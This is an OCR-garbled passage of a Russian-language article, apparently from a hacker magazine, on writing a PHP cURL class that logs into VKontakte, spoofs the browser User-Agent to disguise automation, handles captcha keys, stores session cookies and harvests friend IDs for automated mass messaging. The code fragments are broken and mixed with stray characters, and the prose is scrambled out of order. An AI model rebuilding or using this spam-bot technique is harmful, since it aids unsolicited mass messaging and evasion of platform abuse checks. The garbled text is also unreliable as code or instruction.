успешно, и

cookies передались без проблем, Теперь давай в

точности повторим этот механизм авторизации на сервере

«ВКонтакте», используя почти все заголовки в

.,+++

POST -запросе

[в частности, ПрVtсвоим заголовку Ассерt-Епсоdiпg значение idепtitу, чтобы опустить получение данных в сжатом виде]. Это

$ch=cur1_init (); / iннициализируем / / Настраиваем сеанс CURL

-'+++

сеанс

CUP,L

тут необязательно. но другие

web-pecypcbl

могут быть очень

ПрИДVtрчивы к отсутствиютех или иных заголовков. Как реше­

1/

Подробнее (нотрите висходниках

ние

/ I

задаем целевой скрип'!'

сформированный браузером. Ниже >1 буду поочередно описывать

cur1_setopt($ch, CURLOPT_URL,

, http://pda. vkontakte. L'u/write' ) ;

наш запрос должен быть максимально похож на запрос.

основные функции из своего класса автоматической рас­

сылки по «ВКонтакте» [позтому срочно открой сорцы с нашего

OVO

С'+++

-

и наЧVtнай их осиливать под моим трепетным руковод­

ством). Возьмем следующую РНР-шную фУНКЦVtю:

.-+ ++

/I

Включаем ПОilучение заГQЛОВКОВ

/!

определяем Ти.r1 6раузера для маскироьки

1;' установим требование воэвращений оггвета сервера !;' заносии

!I 1/

закрываем сессию

СформированныеPOST -данные отправляются на СКрVtпт

h1lJU'L

vkОПlаktеЛJ/lоgiп.рhр. Представленная выше функция lоgiп_сооk(] принимает входящими пара метрами логин, пароль, id-номер

cookies

картинки

отправляеr~ запрос

,1 / заносим пришеДllIИЙ ответ в переЫ.еНhУЮ $al1S 1tJer

.-+++

login_

сооk($10giп,$раss,$сарtсhа_sid,$сарtсhа_kеу1.

captcha

и разгаданный ключ

captcha.

соответственно

[последние часто ~Iеобяэательны, позтому могут содержать нулевые

значенияl. Результатом станет возвра щение состояния авториза ­

ClJP.L

ции и занесеНVtе cookies в переменную класса $this.-7auth_cook. В случае успешной авторизации функция возвращает id пользовате,

1/ паРСИi'·1 СllИСОК друзей и заНОСИJ."\1 их id

.,+++

/I

.+++

$this->fr_siz preg_rnatch_a11 ( '#

Related Documents


More Documents from "International Business Times"

Issue23-ru
May 2020 11
May 2020 29
Issue25-ru
May 2020 14
Issue24-ru
May 2020 7
Issue22-ru
May 2020 12